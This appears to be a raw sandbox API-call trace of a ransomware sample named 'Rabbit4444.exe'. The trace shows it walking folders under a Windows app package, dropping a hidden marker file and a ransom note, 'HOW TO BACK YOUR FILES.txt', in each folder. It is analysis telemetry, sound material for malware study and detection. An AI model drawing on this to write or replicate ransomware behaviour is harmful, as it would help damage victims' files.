(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.162] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.164] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.165] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.165] CloseHandle (hObject=0x2a0) returned 1 [0065.166] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp") returned 102 [0065.166] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.166] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf029a047, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0065.166] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.166] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.166] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.166] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.166] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf029a047, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.166] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.166] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.166] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.166] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf029a047, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf029a047, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf029a047, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.166] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.166] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.166] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf029a047, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf029a047, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf029a047, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.166] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0065.166] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.167] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.168] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.168] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.169] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.169] CloseHandle (hObject=0x2cc) returned 1 [0065.169] CloseHandle (hObject=0x2a0) returned 1 [0065.169] GetCurrentThreadId () returned 0xd98 [0065.169] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0065.169] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory" [0065.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126138 | out: hHeap=0xe0000) returned 1 [0065.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0065.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory" [0065.169] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\" [0065.169] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0065.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.170] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.172] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.173] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.174] CloseHandle (hObject=0x2a0) returned 1 [0065.174] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory") returned 109 [0065.174] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.174] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf029a047, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.174] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.174] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.174] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.174] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.174] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf029a047, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.174] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.174] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.174] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.174] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.174] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.174] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf029a047, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf029a047, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.175] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.175] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.175] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf029a047, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf029a047, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.175] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.175] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.175] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.175] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.175] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.176] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.176] CloseHandle (hObject=0x2cc) returned 1 [0065.176] CloseHandle (hObject=0x2a0) returned 1 [0065.176] GetCurrentThreadId () returned 0xd98 [0065.176] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0065.176] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies" [0065.176] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125f68 | out: hHeap=0xe0000) returned 1 [0065.176] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0065.176] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies" [0065.176] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\" [0065.176] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0065.176] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.177] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.179] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.180] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.180] CloseHandle (hObject=0x2a0) returned 1 [0065.180] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies") returned 109 [0065.181] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.181] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.181] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.181] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.181] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.181] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.181] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.181] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.181] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.181] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.181] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.181] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.181] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf02c0298, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf02c0298, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.181] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.181] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.181] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf02c0298, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf02c0298, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.181] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.181] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.182] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.182] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.183] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.183] CloseHandle (hObject=0x2cc) returned 1 [0065.183] CloseHandle (hObject=0x2a0) returned 1 [0065.183] GetCurrentThreadId () returned 0xd98 [0065.183] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0065.183] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache" [0065.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ba48 | out: hHeap=0xe0000) returned 1 [0065.183] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0065.183] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache" [0065.183] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\" [0065.183] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0065.183] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.184] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.187] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.187] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.187] CloseHandle (hObject=0x2a0) returned 1 [0065.188] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache") returned 107 